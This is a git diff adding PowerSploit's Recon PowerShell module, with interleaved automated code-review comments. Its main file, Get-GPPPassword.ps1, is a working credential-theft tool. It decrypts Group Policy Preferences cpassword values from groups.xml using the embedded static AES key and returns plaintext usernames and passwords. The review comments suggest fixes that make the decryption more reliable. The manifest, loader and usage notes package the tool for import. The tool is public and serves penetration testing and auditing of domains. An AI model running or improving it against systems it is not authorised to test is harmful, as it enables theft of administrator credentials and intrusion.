-rw-r--r--Recon/Get-GPPPassword.ps198
-rw-r--r--Recon/Recon.psd188
-rw-r--r--Recon/Recon.psm11
-rw-r--r--Recon/Usage.md12
4 files changed, 199 insertions, 0 deletions
diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1
new file mode 100644
index 0000000..99a694b
--- /dev/null
+++ b/Recon/Get-GPPPassword.ps1
@@ -0,0 +1,98 @@
+function Get-GPPPassword {
+
+<#
+.Synopsis
+
+ Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
+ Author: Chris Campbell (@obscuresec)
+ License: BSD 3-Clause
+
+.Description
+
+ Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
+
+.Parameter Path
+
+ The path to the targeted groups.xml file.
+
+.Example
+
+ Get-GPPPassword -path c:\demo\groups.xml
+
+.Link
+
+ http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+ http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+#>
+
+Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )
+
+ #Function to pull encrypted password string from groups.xml
+ function Parse-cPassword {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
+ } catch { Write-Error "No Password Policy Found in File!" }
+
+ return $Cpassword
+ }
+
+ #Function to look to see if the administrator account is given a newname
+ function Parse-NewName {
+
+ [xml] $Xml = Get-Content ($Path)
+ [String] $NewName = $Xml.Groups.User.Properties.newName
+
+ return $NewName
+ }
+
+ #Function to parse out the Username whose password is being specified
+ function Parse-UserName {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [string] $UserName = $Xml.Groups.User.Properties.userName
+ } catch { Write-Error "No Username Specified in File!" }
+
+ return $UserName
+ }
+
+ #Function that decodes and decrypts password
+ function Decrypt-Password {
+
+ try {
+ #Append appropriate padding based on string length
+ $Pad = "=" * (4 - ($Cpassword.length % 4))
+ $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
+ #Create a new AES .NET Crypto Object
+ $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
+ [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
+ 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
+ #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
+ $AesIV = New-Object Byte[]($AesObject.IV.Length)
+ $AesObject.IV = $AesIV
+ $AesObject.Key = $AesKey
+ $DecryptorObject = $AesObject.CreateDecryptor()
+ [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
+
+ return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
+ } catch { Write-Error "Decryption Failed!" }
+
+ }
+
+ $Cpassword = Parse-cPassword
+ $Password = Decrypt-Password
+ $NewName = Parse-NewName
+ $UserName = Parse-UserName
+
+ $Results = New-Object System.Object
+
+ Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
+ Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
+ Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
+
+ return $Results
+
+}
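Review bot: The padding computation at `$Pad = "=" * (4 - ($Cpassword.length % 4))` appends four `=` characters whenever the cpassword length is already a multiple of 4, and `[Convert]::FromBase64String` then throws, so well-formed inputs of those lengths are reported as "Decryption Failed!"; use `$Pad = "=" * ((4 - ($Cpassword.Length % 4)) % 4)`. The `Param` block marks `$Path` as `Mandatory = $True` while also assigning it a default, which is contradictory — the binder prompts when the argument is missing and the default is never used, so one of the two should go. The three `Parse-*` helpers each call `Get-Content` and re-parse the same file; reading the `[xml]` once and handing it to the helpers removes the repeated I/O and lets a single `try`/`catch` cover the parse. A `catch` that only calls `Write-Error` lets the function fall through and emit a result object with an empty `Password`, so callers cannot tell failure from an empty value; `throw` (or returning nothing) in the failure paths would make that explicit.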
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1
new file mode 100644
index 0000000..59c6377
--- /dev/null
+++ b/Recon/Recon.psd1
@@ -0,0 +1,88 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Recon.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Reconnaissance Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
+
+# List of all files packaged with this module
+FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1',
+ 'Invoke-ReverseDnsLookup.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+} \ No newline at end of file
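Review bot: `FileList` names `Get-HttpStatus.ps1` and `Invoke-ReverseDnsLookup.ps1`, but this commit adds only `Get-GPPPassword.ps1`, `Recon.psm1`, `Recon.psd1` and `Usage.md` under `Recon/`, so unless those scripts arrive in a separate commit the manifest describes files that are not there; `FileList` is informational and will not fail the import, which makes the mismatch easy to miss. `FunctionsToExport = '*'` combined with a loader that dot-sources every `.ps1` in the folder exports whatever function any script placed in the directory defines; listing the intended public surface explicitly, e.g. `FunctionsToExport = 'Get-GPPPassword'`, keeps what the module exposes deliberate and reviewable.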
diff --git a/Recon/Recon.psm1 b/Recon/Recon.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Recon/Recon.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} \ No newline at end of file
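Review bot: The loader relies on the `%` alias for `ForEach-Object` and a wildcard folded into `Join-Path`; in a module file that is copied to other machines, spelled-out cmdlets and `-Filter` read more clearly and do not depend on alias resolution: `Get-ChildItem -Path $PSScriptRoot -Filter '*.ps1' | ForEach-Object { . $_.FullName }`. Dot-sourcing every `.ps1` in the module directory means any script file dropped beside the module runs at import time, so the manifest's `FileList` is the only record of what is expected there; a comment stating that intent, such as `# Dot-source every script in this directory; keep FileList in Recon.psd1 in sync.`, would make the contract visible to whoever maintains the folder.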
diff --git a/Recon/Usage.md b/Recon/Usage.md
new file mode 100644
index 0000000..9bfe35e
--- /dev/null
+++ b/Recon/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Recon`
+
+To see the commands imported, type `Get-Command -Module Recon`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. \ No newline at end of file